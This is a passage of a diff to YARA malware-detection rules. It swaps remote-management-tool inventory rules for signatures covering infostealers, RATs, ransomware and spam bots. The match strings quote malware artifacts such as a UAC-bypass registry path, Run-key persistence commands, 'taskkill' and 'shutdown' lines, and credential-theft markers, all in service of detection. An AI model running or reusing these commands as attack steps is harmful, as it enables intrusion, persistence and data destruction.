"INDICATOR.Win.RMM.PulseWay" strings: - $s1 = "MM.Monitor." ascii - $s2 = "RDAgentSessionSettingsV" ascii - $s3 = "CheckForMacOSRemoteDesktopUpdateCompletedEvent" ascii - $s4 = "ConfirmAgentStarted" ascii - $s5 = "GetScreenshot" ascii - $s6 = "UnloadRemoteDesktopDlls" ascii - $s7 = "CtrlAltDeleteProc" ascii - $s8 = "$7cfc3b88-6dc4-49fc-9f0a-bf9e9113a14d" ascii - $s9 = "computermonitor.mmsoft.ro" ascii + $s1 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\TaskKill" fullword wide + $s2 = "KoiVM" ascii + $s3 = "RunpeX.Stub.Framework" wide + $s4 = "ExceptionServices.ExceptionDispatchInfo" wide + $s5 = "Kernel32.Dll" wide condition: - ( uint16(0)==0x5a4d or uint16(0)==0xcfd0) and 7 of them + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Pulseway_Remotedesktop : FILE +rule DITEKSHEN_MALWARE_Win_Cyberstealer : FILE { meta: - description = "Detects Pulseway Rempte Desktop client" + description = "Detects CyberStealer infostealer" author = "ditekSHen" - id = "8bca3cef-b24f-597a-a6e2-86040ed726f4" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L268-L286" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "a542c11f21ab48f4da69df4e7cb46531658a714687e2c2f8ccf78dc2a0338b68" + id = "cb02013f-ffb2-5a17-9d6e-1d19b0e98fb8" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9920-L9941" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "72413b68fa1381656202165dcd878761727e7caf0f15ccd65f3f2f842243a1f6" score = 75 - quality = 75 + quality = 71 tags = "FILE" - clamav1 = "INDICATOR.Win.RMM.PulseWay" strings: - $s1 = "RemoteControl" ascii - $s2 = "MM.Monitor.RemoteDesktopClient." ascii - $s3 = "MM.Monitor.RemoteControl" ascii - $s4 = "RemoteDesktopClientUpdateInfo" ascii - $s5 = "ShowRemoteDesktopEnabledSystemsOnly" ascii - $s6 = "$31f50968-d45c-49d6-ace9-ebc790855a51" ascii + $x1 = "\\Cyber Stealer\\" ascii + $s1 = "[Virtualization]" fullword wide + $s2 = "\"encryptedPassword\":\"([^\"]+)\"" fullword wide + $s3 = "CreditCard" fullword ascii + $s4 = "DecryptPassword" fullword ascii + $s5 = "_modTime" fullword ascii + $s6 = "_pathname" fullword ascii + $s7 = "_pathnameInZip" fullword ascii + $s8 = "GetBookmarksDBPath" fullword ascii + $s9 = "GrabberImages" fullword ascii + $r1 = "^1[a-km-zA-HJ-NP-Z1-9]{25,34}$" wide + $r2 = "^3[a-km-zA-HJ-NP-Z1-9]{25,34}$" wide + $r3 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" wide + $r4 = "^(?!:\\/\\/)([a-zA-Z0-9-_]+\\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\\.[a-zA-Z]{2,11}?$" wide condition: - ( uint16(0)==0x5a4d or uint16(0)==0xcfd0) and 5 of them + uint16(0)==0x5a4d and ((1 of ($x*) and (2 of ($s*) or 2 of ($r*))) or 7 of ($s*) or (5 of ($s*) and 2 of ($r*)) or ( all of ($r*) and 4 of ($s*))) } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Pulseway_CERT : FILE +rule DITEKSHEN_MALWARE_Win_Arrowrat : FILE { meta: - description = "Detects PulseWay by (default) certificate. Review RMM Inventory" + description = "Detects ArrowRAT" author = "ditekSHen" - id = "e00f51dc-261e-5a38-89ed-1899d9b522d4" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L288-L302" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "c667caa9b7de4b166630c66e5162071948fa93c68b1cdb3038fce28e13dcb1a9" + id = "14d3aabe-1ef5-599f-adbd-61b580099447" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9943-L9961" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "13e6d4fd274f75c50aa4110276812d02885c03cfc269dde480db66955e5f703a" score = 75 quality = 75 tags = "FILE" + strings: + $s1 = "29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb" wide + $s2 = "Software\\Classes\\ms-settings\\shell\\open\\command" wide + $s3 = "DelegateExecute" fullword wide + $s4 = "powershell" wide + $s5 = "DESKTOP_HOOKCONTROL" fullword ascii + $s6 = "PROCESS_INFORMATION" fullword ascii + $s7 = "STARTUP_INFORMATION" fullword ascii + $s8 = /(Venom|Pandora)\shVNC/ fullword wide + $s9 = "cmd.exe /k START" fullword wide + $s10 = "ExclusionWD" fullword ascii + $s11 = "WinExec" fullword ascii + condition: - uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].issuer contains "DigiCert, Inc." and pe.signatures[i].subject contains "MMSOFT Design Ltd.") + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Manageengine_Zohomeeting : FILE +rule DITEKSHEN_MALWARE_Win_Ducktail : FILE { meta: - description = "Detects ManageEngine Zoho Meeting (dc_rds.exe)" + description = "Detects DuckTail" author = "ditekSHen" - id = "b15efdd1-323c-5ed6-894d-b44f04d2eaf3" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L304-L324" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "8066bcd17245efcc73f2bef7f022ad23ab648fe0ad15ca66c0d387ce4eda998b" + id = "2d1a8f9e-ed5f-53fa-8ba8-b6d1344f6d39" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9963-L9991" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a416212e5f87b33fdc14590c3d6d6ebc2915c2b383adf78d660c9408beb2323f" score = 75 quality = 75 tags = "FILE" - clamav1 = "INDICATOR.Win.RMM.ManageEngine-ZohoMeeting" strings: - $s1 = "bin\\ClientAuthHandler.dll" wide - $s2 = "AgentHook.dll" wide - $s3 = "UEMS - Remote Control" wide - $s4 = "Install hook...." wide - $s5 = "india.adventnet.com/meet.sas?k=" ascii - $s6 = "dcTcpSocket::" ascii - $s7 = "%s/%s?clientId=%s&sessionId=%s&clientName=%s&ticket=%s&connectionId=%s" ascii - $s8 = ".\\engines\\ccgost\\gost_" ascii + $s1 = "&global_scope_id=" wide + $s2 = "#ResolveMyIpAll" wide + $s3 = "#ApproveInvitesHandler" wide + $s4 = "#ProcessShareCok" wide + $s5 = "#InviteEmpHandler" wide + $s6 = "__activeScenarioIDs=%" wide + $s7 = "&__a=1&fb_dtsg=" wide + $s8 = "adAccountLimit\":(.*?)}" wide + $s9 = "|PUSH|" fullword wide + $s10 = "|SCREEN|" fullword wide + $s11 = "|SCREEC|" fullword wide + $s12 = "_ad_accounts>k__" ascii + $s13 = "get_Pwds" fullword ascii + $s14 = "Telegram.Bot" ascii + $s15 = { 2f 00 7b 00 43 00 59 00 52 00 7d 00 2e 00 74 00 + 78 00 74 00 00 15 2f 00 7b 00 4c 00 4f 00 47 00 + 7d 00 2e 00 74 00 78 00 74 00 00 15 2f 00 7b 00 + 43 00 46 00 47 00 7d 00 2e 00 74 00 78 00 74 00 + 00 15 2f 00 7b 00 50 00 52 00 53 00 7d 00 2e 00 + 74 00 78 00 74 00 00 15 2f 00 7b 00 53 00 43 00 + 52 00 7d 00 2e 00 6a 00 70 00 67 } condition: - uint16(0)==0x5a4d and 5 of them + uint16(0)==0x5a4d and 13 of them } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Atera : FILE +rule DITEKSHEN_MALWARE_Win_Grum : FILE { meta: - description = "Detects Atera. Review RMM Inventory" + description = "Detect Grum spam bot" author = "ditekSHen" - id = "9801f5c9-bc1e-5502-8bca-ee1f5ca0f497" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L345-L366" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "dbc37a941b38d36ea9bc31880c3cba6cd2b88b534583e86741f7686fcb410235" + id = "e9abaed1-f462-5099-b310-9f9244c0c8a2" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9993-L10007" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "42a1d57dcddda4a24037af136caace6110b90ee5702c7c01d2a77d2676048c74" score = 75 - quality = 75 + quality = 50 tags = "FILE" - clamav1 = "INDICATOR.Win.RMM.Atera" strings: - $s1 = "SOFTWARE\\ATERA Networks\\AlphaAgent" wide - $s2 = "Monitoring & Management Agent by ATERA" ascii wide - $s3 = "agent-api-{0}.atera.com" wide - $s4 = "agent-api.atera.com" wide - $s5 = "acontrol.atera.com" wide - $s6 = /Agent\/(PingReply|GetCommandsFallback|GetCommands|GetTime|GetEnvironmentStatus|GetRecurringPackages|AgentStarting|AcknowledgeCommands)/ wide - $s7 = "\\AlphaControlAgent\\obj\\Release\\AteraAgent.pdb" ascii - $s8 = "AteraWebAddress" ascii - $s9 = "AlphaControlAgent.CloudLogsManager+<>" ascii + $s1 = "loader_id" fullword ascii + $s2 = "start_srv" fullword ascii + $s3 = "lid_file_upd" fullword ascii + $s4 = "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX" fullword ascii + $s5 = "rcpt to:<%s>" fullword ascii + $s6 = "ehlo %s" fullword ascii + $s7 = "%OUTLOOK_BND_" fullword ascii condition: - uint16(0)==0x5a4d and 4 of them + ( uint16(0)==0x5a4d and 5 of them ) or ( all of them ) } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Atera_CERT : FILE +rule DITEKSHEN_MALWARE_Win_Dlinjector07 : FILE { meta: - description = "Detects Atera by certificate. Review RMM Inventory" + description = "Detects downloader injector" author = "ditekSHen" - id = "a5ccb684-1e28-51c8-a4d6-0b5abba97de0" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L368-L383" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "f51fef767cd529271f06d578146634e1ab5ee5ac3ffb829cbaa870e7c69ca3f6" + id = "244ad6fb-8769-5b57-84e2-66f51fccb32a" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10009-L10025" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "aef43b59ef7d0d62a853280ec1588a48d6c21da5218b7fd7e6ab1aa0f048896b" score = 75 - quality = 75 + quality = 73 tags = "FILE" - clamav1 = "INDICATOR.Win.RMM.Atera" + + strings: + $x1 = "23lenrek[||]lldtn[||]daerhTemuseR[||]txetnoCdaerhTteS46woW[||]txetnoCdaerhTteS[||]txetnoCdaerhTteG46woW[||]txetnoCdaerhTteG[||]xEcollAlautriV[||]yromeMssecorPetirW[||]yromeMssecorPdaeR[||]noitceSfOweiVpamnUwZ[||]AssecorPetaerC" wide + $l1 = "[||]" wide + $r1 = "yromeMssecorPetirW" wide + $r2 = "xEcollAlautriV" wide + $r3 = "daerhTemuseR" ascii wide + $r4 = "noitceSfOweiVpamnUwZ" wide + $s1 = "Debugger Detected" fullword wide + $s2 = "payload" fullword ascii + $s3 = "_ENABLE_PROFILING" fullword wide condition: - uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].issuer contains "DigiCert" and pe.signatures[i].subject contains "Atera Networks Ltd") + uint16(0)==0x5a4d and (1 of ($x*) or (1 of ($l*) and 2 of ($r*)) or 6 of them ) } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Splashtopstreamer : FILE +rule DITEKSHEN_MALWARE_Win_Stealerium : FILE { meta: - description = "Detects Splashtop Streamer. Review RMM Inventory" + description = "Detects Stealerium infostealer" author = "ditekSHen" - id = "317f2be4-983f-5528-b629-75a13de7b411" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L385-L403" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "67181cd6ae071074c6bf35f44963c11c9ee9b7df242027c15b1e165d108f7b98" + id = "ea137900-3add-54b4-9ce9-bc7e98f86d41" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10027-L10042" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a2834e7fe26ad0197a9e490ab517029ceed2e09506fcc37e6ddf0c1804fa6cb9" score = 75 - quality = 75 + quality = 73 tags = "FILE" - clamav1 = "INDICATOR.Win.RMM.SplashtopStreamer" strings: - $s1 = "\\slave\\workspace\\GIT_WIN_SRS_Formal\\Source\\irisserver\\" ascii - $s2 = ".api.splashtop.com" wide - $s3 = "Software\\Splashtop Inc.\\Splashtop" wide - $s4 = "restarted the streamer.%nApp version: %1" wide - $s5 = "Splashtop-Splashtop Streamer-" wide - $s6 = "[RemoveStreamer] Send msg 2 cloud(%d:%d:%d)" wide + $x1 = "Stealerium" ascii wide + $x2 = /\.Target\.(Passwords|Messengers|Browsers|VPN|Gaming)\./ ascii + $x3 = /\.Modules\.(Keylogger|Implant|Passwords|Messengers|Browsers|VPN|Gaming|Clipper)\./ ascii + $s1 = "Timeout /T 2 /Nobreak" fullword wide + $s2 = "Directory not exists" wide + $s3 = "### {0} ### ({1})" wide + $s4 = /---\s(AntiAnalysis|WebcamScreenshot|Keylogger|Clipper)/ wide + $s5 = " *Keylogger " fullword wide condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and ( all of ($x*) or (2 of ($x*) and all of ($s*))) } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Splashtopstreamer_CERT : FILE +rule DITEKSHEN_MALWARE_Linux_Gobrat : FILE { meta: - description = "Detects Splashtop Streamer by certificate. Review RMM Inventory" + description = "Detects GobRAT" author = "ditekSHen" - id = "7e0e4d6f-38a3-5cac-8a82-8aea7943d373" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L405-L419" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0a1225a79ff30678846b9cb4315419be04b46276b3e05310a21d088b30f01b72" + id = "0561fa99-24ee-5e02-ba54-17a1dd81daa4" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10044-L10062" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "070687c909b066e38f72b6421b77670e87476d7e1eb1ed8d41d027836629eb71" score = 75 quality = 75 tags = "FILE" + strings: + $x1 = "BotList" ascii + $x2 = "BotCount" ascii + $x3 = "/etc/services/zone/bot.log" ascii + $x4 = "aaa.com/bbb/me" ascii + $s1 = "encoding/gob." ascii + $s2 = ".GetMacAddress" ascii + $s3 = ".IpString2Uint32" ascii + $s4 = ".RegisterLogFile" ascii + $s5 = ".UniqueAppendString" ascii + $s6 = ".NewDaemon" ascii + $s7 = ".SimpleCommand" ascii + condition: - uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].issuer contains "DigiCert" and pe.signatures[i].subject contains "Splashtop Inc.") + uint16(0)==0x457f and (3 of ($x*) or (2 of ($x*) and 3 of ($s*)) or (1 of ($x*) and 5 of ($s*)) or all of ($s*)) } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Aeroadmin : FILE +rule DITEKSHEN_MALWARE_Win_Hakunamatata : FILE { meta: - description = "Detects AeroAdmin. Review RMM Inventory" + description = "Detects HakunaMatata ransomware" author = "ditekSHen" - id = "0f69c6da-40e4-5952-b6f9-ed401279eb9e" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L421-L442" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "a0a9e15f31b6b06fbc749b863563c30351c775c1b1d17952013670e7e1d68c41" + id = "43ca40bb-9eb6-558e-977d-f1fff5659565" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10064-L10084" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b49705845e5440c3c1e47e196592ca2b31319d1af5265f2f954d3367e3d39d5c" score = 75 quality = 75 tags = "FILE" - clamav1 = "INDICATOR.Win.RMM.AeroAdmin" strings: - $s1 = "\\AeroAdmin" wide - $s2 = ".aeroadmin.com" ascii wide - $s3 = "XAeroadminAppRestarter" wide - $s4 = "SYSTEM\\ControlSet001\\Control\\SafeBoot\\Network\\AeroadminService" wide - $s5 = "AeroAdmin {}" ascii - $s6 = "FAeroAdmin.cpp" fullword ascii - $s7 = "Referer: http://900100.net" ascii - $s8 = "POST /sims/sims_new.php" ascii - $s9 = "aeroadmin.pdb" ascii + $s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide + $s2 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" wide + $s3 = "" wide + $s4 = "HAKUNA MATATA" ascii wide + $s5 = "EXCEPTIONAL_FILE" ascii + $s6 = "TRIPLE_ENCRYPT" ascii + $s7 = "FULL_ENCRYPT" ascii + $s8 = "TARGETED_EXTENSIONS" ascii + $s9 = "CHANGE_PROCESS_NAME" ascii + $s10 = "KILL_APPS_ENCRYPT_AGAIN" ascii + $s11 = "b__" ascii + $s12 = "dataToEncrypt" ascii + $s13 = "" ascii condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Aeroadmin_CERT : FILE +rule DITEKSHEN_MALWARE_Win_Hakunamatata_Builder : FILE { meta: - description = "Detects AeroAdmin by certificate. Review RMM Inventory" + description = "Detects HakunaMatata ransomware builder" author = "ditekSHen" - id = "ca34fd3c-eb76-57e3-8b62-ab0d0c9ec7b3" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L444-L461" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "f1fe2d2bb6a8afd25fc5ee7a60fe5a931484591bafab24c5d488c7f0483e248a" + id = "dbf3490f-418c-5d3b-9f9e-e9fb29d8b652" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10086-L10104" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "ac258851de38504cf63ba51fd06f8a9a3dfbe0096d199ba702e9763b5ecc43e4" score = 75 - quality = 75 + quality = 73 tags = "FILE" - clamav1 = "INDICATOR.Win.RMM.AeroAdmin" + + strings: + $s1 = "ENCRYPT FILES IN PROCESS" wide + $s2 = "#TARGET_FILES" ascii wide + $s3 = "HAKUNA MATATA" ascii wide nocase + $s4 = "#PRIVATE_KEY" ascii wide + $s5 = "/target:winexe /platform:anycpu /optimize+" wide + $s6 = "/win32icon:" fullword wide + $s7 = "SkippedFolders" ascii + $s8 = "RECURSIVE_DIRECTORY_LOOK(" ascii + $s9 = "DRAW_WALLPAPER(" ascii + $s10 = "startupKey.SetValue(MESSAGE_FILE.Split('.')[0], executablePath);" ascii + $s11 = /\\obj\\(Debug|Release)\\Hakuna\sMatata\.pdb/ ascii condition: - uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].issuer contains "GlobalSign" and (pe.signatures[i].subject contains "Aeroadmin LLC" or pe.signatures[i].subject contains "@aeroadmin.com")) + uint16(0)==0x5a4d and 5 of them } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_Reflectiveloader : FILE +rule DITEKSHEN_MALWARE_Win_Twarbot : FILE { meta: - description = "Detects Reflective DLL injection artifacts" + description = "Detect TWarBot IRC Bot" author = "ditekSHen" - id = "b7bd9184-48f8-5ad8-a234-632e4ec9814d" - date = "2024-06-08" - modified = "2024-06-08" + id = "3acae103-c8d8-5959-83fd-f47d33da350b" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L29-L43" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "540a48f98652c84b09f1076c2e2fca680781f533c936d602809179469a850ba0" - score = 40 - quality = 45 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10106-L10121" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "6b1b0b92d2ea7adec58a4b0ac712384542d96dc8707b6f1f13df2d8150a03a7a" + score = 75 + quality = 75 tags = "FILE" - importance = 20 strings: - $s1 = "_ReflectiveLoader@" ascii wide - $s2 = "ReflectiveLoader@" ascii wide + $x1 = "TWarBot" fullword ascii + $s1 = "PRIVMSG #" ascii + $s2 = "C:\\marijuana.txt" fullword ascii + $s3 = "C:\\rar.bat" fullword ascii + $s4 = "C:\\zip.bat" fullword ascii + $s5 = "software\\microsoft\\windows\\currentversion\\app paths\\winzip32.exe" ascii + $s6 = "software\\microsoft\\windows\\currentversion\\app paths\\WinRAR.exe" ascii + $s7 = "a -idp -inul -c- -m5" ascii condition: - uint16(0)==0x5a4d and (1 of them or (pe.exports("ReflectiveLoader@4") or pe.exports("_ReflectiveLoader@4") or pe.exports("ReflectiveLoader"))) + uint16(0)==0x5a4d and ((1 of ($x*) and 3 of ($s*)) or 5 of ($s*)) } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_IMG_Embedded_Archive : FILE +rule DITEKSHEN_MALWARE_Win_G0Crypt : FILE { meta: - description = "Detects images embedding archives. Observed in TheRat RAT." + description = "Detects G0Crypt / BRG0SNet / NovaGP ransomware" author = "ditekSHen" - id = "2c8e15dc-2e84-5f9b-b538-cba204a3d38c" - date = "2024-06-08" - modified = "2024-06-08" + id = "c0dd8a1b-1aa6-50be-92c4-125eabaf3f9f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L45-L66" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0e61bc2489a54047c66a659ae2cb6df66683845676e1c02c34d9a0987ddec4bb" - score = 40 - quality = 37 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10123-L10156" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a678bbb02b82c34fb5e7bdce2e60b0da88f12b094e7ca3b74345814d0da5ce42" + score = 75 + quality = 73 tags = "FILE" - importance = 20 strings: - $sevenzip1 = { 37 7a bc af 27 1c 00 04 } - $sevenzip2 = { 37 e4 53 96 c9 db d6 07 } - $zipwopass = { 50 4b 03 04 14 00 00 00 } - $zipwipass = { 50 4b 03 04 33 00 01 00 } - $zippkfile = { 50 4b 03 04 0a 00 02 00 } - $rarheade1 = { 52 61 72 21 1a 07 01 00 } - $rarheade2 = { 52 65 74 75 72 6e 2d 50 } - $rarheade3 = { 52 61 72 21 1a 07 00 cf } - $mscabinet = { 4d 53 46 54 02 00 01 00 } - $zlockproe = { 50 4b 03 04 14 00 01 00 } - $winzip = { 57 69 6E 5A 69 70 } - $pklite = { 50 4B 4C 49 54 45 } - $pksfx = { 50 4B 53 70 58 } + $x1 = "G0Crypt/go/" ascii + $x2 = "BRG0SNet" ascii + $x3 = "/NovaGroup" ascii + $x4 = "novagroup@onionmail.org" ascii nocase + $x5 = "# Nova Group" ascii + $f1 = "main.HaveRun" ascii + $f2 = "main.FindFile" ascii + $f3 = "main.deriveKey" ascii + $f4 = "main.Pwd" fullword ascii + $f5 = "/ClearBashFile" ascii + $f6 = "/ClearUserTempFiles" ascii + $f7 = "/KillProccess" ascii + $f8 = "/Encryptor" ascii + $f9 = "/NoDirEncrypt" ascii + $f10 = "/RunCmdEexecutable" ascii + $f11 = "/StopImportantServices" ascii + $f12 = "/GetPwd" ascii + $s1 = "\\$Recycle.Bin" + $s2 = ".README.txt" + $s3 = "\\BRSPATH.exe" + $s4 = "taskkill /F /IM sql*" + $s5 = "C:\\inetpub\\logs\\" + $s6 = "shutdown /r" + $s7 = ":\\Program Files\\VMware\\" + $s8 = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Message /t REG_SZ /d" + $s9 = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v DelLogSoft /t REG_SZ /d" condition: - ( uint32(0)==0xe0ffd8ff or uint32(0)==0x474e5089 or uint16(0)==0x4d42) and 1 of them + uint16(0)==0x5a4d and (2 of ($x*) or 7 of ($f*) or (1 of ($x*) and (5 of ($f*) or 5 of ($s*))) or (6 of ($f*) and 4 of ($s*)) or 12 of them ) } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Uacbypass_Eventviewer : FILE +rule DITEKSHEN_MALWARE_Win_Akira : FILE { meta: - description = "detects Windows exceutables potentially bypassing UAC using eventvwr.exe" + description = 